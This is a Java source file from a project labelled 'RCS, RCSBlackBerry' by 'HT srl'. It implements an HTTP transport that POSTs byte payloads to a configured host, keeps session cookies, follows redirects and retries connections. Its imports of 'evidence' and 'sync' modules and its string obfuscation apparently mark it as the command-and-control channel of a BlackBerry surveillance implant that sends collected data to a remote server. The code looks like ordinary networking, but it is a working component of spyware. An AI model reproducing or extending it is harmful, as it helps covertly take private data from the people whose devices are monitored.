

/* *************************************************
 * Copyright (c) 2010 - 2011
 * HT srl,   All rights reserved.
 * 
 * Project      : RCS, RCSBlackBerry
 * *************************************************/

package blackberry.action.sync.transport;

import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;

import javax.microedition.io.Connector;
import javax.microedition.io.HttpConnection;

import net.rim.device.api.io.IOCancelledException;
import net.rim.device.api.io.http.HttpProtocolConstants;
import blackberry.Messages;
import blackberry.Status;
import blackberry.config.Cfg;
import blackberry.debug.Check;
import blackberry.debug.Debug;
import blackberry.debug.DebugLevel;
import blackberry.evidence.Evidence;
import blackberry.utils.Utils;

public abstract class HttpTransport extends Transport {

    private static final int PORT = 80;






    String host;

    public HttpTransport(String host) {
        super(
                Messages.getString("l.1") + host + ":" + PORT + Messages.getString("l.3")); //$NON-NLS-1$ //$NON-NLS-2$ //$NON-NLS-3$

        this.host = host;
        cookie = null;
        stop = false;
    }

    //private String transportId;
    protected String cookie;

    boolean stop;
    boolean follow_moved = true;

    protected final String HD_CONTENTTYPE = Messages.getString("l.4"); //$NON-NLS-1$
    protected final String HD_SETCOOKIE = Messages.getString("l.5"); //$NON-NLS-1$
    protected final String HD_CONTENTLEN = Messages.getString("l.6"); //$NON-NLS-1$

    //private final String USER_AGENT = "Profile/MIDP-2.0 Configuration/CLDC-1.0";
    protected final String CONTENT_TYPE = Messages.getString("l.7"); //$NON-NLS-1$

    public void start() {



        follow_moved = false;


        cookie = null;
    }

    public void close() {
        cookie = null;
    }

    public synchronized byte[] command(byte[] data) throws TransportException {
        boolean available = isAvailable();




        if (!available) {
            throw new TransportException(20);
        }

        // sending request
        HttpConnection connection = null;
        try {



            connection = createRequest();



            sendHttpPostRequest(connection, data);
        } catch (TransportException ex) {



            Utils.sleep(1000);
            connection = createRequest();
            sendHttpPostRequest(connection, data);
        }

        if (connection == null) {



            throw new TransportException(32);
        }





        int status;
        try {




            status = connection.getResponseCode();

            // if it's moved, try with the new url
            if (follow_moved
                    && (status == HttpConnection.HTTP_MOVED_TEMP
                            || status == HttpConnection.HTTP_MOVED_PERM || status == HttpConnection.HTTP_TEMP_REDIRECT)) {
                baseurl = connection.getHeaderField(Messages.getString("l.15")); //$NON-NLS-1$




                throw new TransportException(33);
            }

            // check response, if ok parse it            
            if (status == HttpConnection.HTTP_OK) {



                byte[] content = parseHttpConnection(connection);



                return content;
            } else {







                throw new TransportException(7);
            }
        } catch (IOException e) {



            throw new TransportException(8);
        } finally {
            try {
                if (connection != null) {



                    connection.close();
                    connection = null;
                }
            } catch (IOException e) {



            }
        }
    }

    protected HttpConnection createRequest() throws TransportException {

        String content = ""; //$NON-NLS-1$

        boolean httpOK;
        HttpConnection httpConn = null;

        try {
            String url = getUrl();



            // qui sembra bloccarsi, certe volte, con wifi.
            httpConn = (HttpConnection) open(url);




            httpConn.setRequestMethod(HttpConnection.POST);

            if (cookie != null) {



                httpConn.setRequestProperty(
                        HttpProtocolConstants.HEADER_COOKIE, cookie);
            } else {



            }

            httpConn.setRequestProperty(HttpProtocolConstants.HEADER_HOST,
                    httpConn.getHost());
            httpConn.setRequestProperty(
                    HttpProtocolConstants.HEADER_CONTENT_TYPE, CONTENT_TYPE);
            httpConn.setRequestProperty(
                    HttpProtocolConstants.HEADER_CONNECTION, "Keep-Alive"); //$NON-NLS-1$





        } catch (Exception ex) {
            if (httpConn != null) {
                try {
                    httpConn.close();
                } catch (IOException e) {



                }
            }



            throw new TransportException(1);
        }
        return httpConn;
    }

    protected boolean sendHttpPostRequest(HttpConnection httpConn, byte[] data)
            throws TransportException {



        String content = ""; //$NON-NLS-1$

        boolean httpOK;
        OutputStream os = null;
        // Open the connection and extract the data.
        try {
            os = httpConn.openOutputStream();
            os.write(data);
            os.close();
            os = null;

            //os.flush(); // Optional, getResponseCode will flush




            int status = httpConn.getResponseCode();
            httpOK = (status == HttpConnection.HTTP_OK);

            /*
             * //#ifdef DEBUG debug.trace("sendHttpPostRequest: closing");
             * //#endif os.close();
             */





        } catch (Exception ex) {



            throw new TransportException(2);
        } finally {
            if (os != null) {
                try {
                    os.close();
                } catch (IOException e) {
                }
            }
        }

        if (!httpOK) {



            //throw new TransportException(2);
        }




        return httpOK;
    }

    protected byte[] parseHttpConnection(HttpConnection httpConn)
            throws TransportException {

        InputStream input = null;
        try {
            // Is this html?
            String contentType = httpConn.getHeaderField(HD_CONTENTTYPE);
            boolean htmlContent = (contentType != null && contentType
                    .startsWith(contentType));

            if (!htmlContent) {




                throw new TransportException(3);
            }

            String setCookie = httpConn.getHeaderField(HD_SETCOOKIE);

            if (setCookie != null) {




                cookie = setCookie;
            }

            String contentLen = httpConn.getHeaderField(HD_CONTENTLEN);




            int totalLen = 0;
            try {
                // expected content size
                totalLen = Integer.parseInt(contentLen);

            } catch (Exception ex) {



                throw new TransportException(4);
            }

            input = httpConn.openInputStream();

            // buffer data
            byte[] buffer = new byte[1024];
            byte[] content = new byte[totalLen];
            int size = 0; // incremental size
            int len = 0; // iterative size

            while (-1 != (len = input.read(buffer))) {




                // Exit condition for the thread. An IOException is 
                // thrown because of the call to  httpConn.close(), 
                // causing the thread to terminate.
                if (stop) {



                    httpConn.close();
                    input.close();
                }
                Utils.copy(content, size, buffer, 0, len);
                size += len;
            }
            buffer = null;





            input.close();
            input = null;





            return content;

        } catch (IOCancelledException e) {



            throw new TransportException(5);
        } catch (IOException e) {



            throw new TransportException(6);
        } finally {
            if (input != null) {
                try {
                    input.close();
                } catch (IOException e) {
                }
            }
        }
    }

    Thread threadOpener;

    protected HttpConnection open(String url) throws TransportException {
        // Crea un thread, dentro il quale genera l'url.
        // Se non esce entro poco, ci riprova.
        InternalOpener opener = new InternalOpener(url);
        if (threadOpener != null) {
            try{
                threadOpener.interrupt();
            }catch(Exception ex){



            }
        }

        threadOpener = new Thread(opener);
        threadOpener.start();

        HttpConnection connection = opener.getConnection();

        if (connection == null) {




            threadOpener.interrupt();

            opener = null;
            threadOpener = null;

            throw new TransportException(25);

        } else {



        }

        opener = null;
        threadOpener = null;
        return connection;
    }

    class InternalOpener implements Runnable {
        private static final int SECS = Cfg.CONNECTION_TIMEOUT;
        HttpConnection connection;
        private String url;
        Object monitor = new Object();

        InternalOpener(String url) {
            this.url = url;
        }

        public void run() {
            try {
                connection = (HttpConnection) Connector.open(url);
            } catch (IOException e) {



            }

            synchronized (monitor) {



                monitor.notifyAll();
            }
        }

        public HttpConnection getConnection() {
            synchronized (monitor) {
                if (connection != null) {
                    return connection;
                }

                try {
                    monitor.wait(SECS * 1000);
                } catch (InterruptedException e) {




                    connection = null;
                }
            }

            return connection;

        }

    }
}
